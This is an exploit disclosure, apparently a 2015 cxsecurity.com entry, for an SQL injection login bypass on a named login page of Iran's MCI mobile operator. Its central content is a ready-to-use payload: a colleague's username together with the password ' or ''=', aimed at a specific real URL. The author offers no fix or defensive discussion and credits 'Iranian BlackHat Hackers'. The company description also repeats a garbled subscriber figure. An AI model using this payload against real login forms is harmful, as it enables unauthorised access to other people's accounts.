MCI Manager Login Authentication bypass vulnerability

2015.11.06
Credit: 4TT4CK3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Description : Mobile Telecommunication Company of Iran (MCI) - Public Company also know under it brand name Hamrah-e-Aval is Iran's first and largest mobile phone network operator. MCI is a subsidiary of the Telecommunication Company of Iran and it has over 18 milion postpaid and over 20 milion postpaid and over 20 milion prepaid subscribers. [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Exploit title : MCI Manager Login Authentication bypass vulnerability ~# : Exploit Author : 4TT4CK3R ~# : Vendor Homepage : https://mciX.ir ~# : Date : 2015/09/03 ~# : Tested on : Kali linux , Windows , Mozilla Firefox ~# : Google Dork : No ~# : Location : https://mci.ir/web/guest/login ~# : Instead password use of ' or ''=' ~# : Username : Colleague Username ~# : Password : ' or ''=' ~# : ScreenShot : http://i.imgur.com/ffRZCLE.png ~# : Discovered by : 4TT4CK3R ~# : Special thanks to : Iranian BlackHat Hackers [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://i.imgur.com/ffRZCLE.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top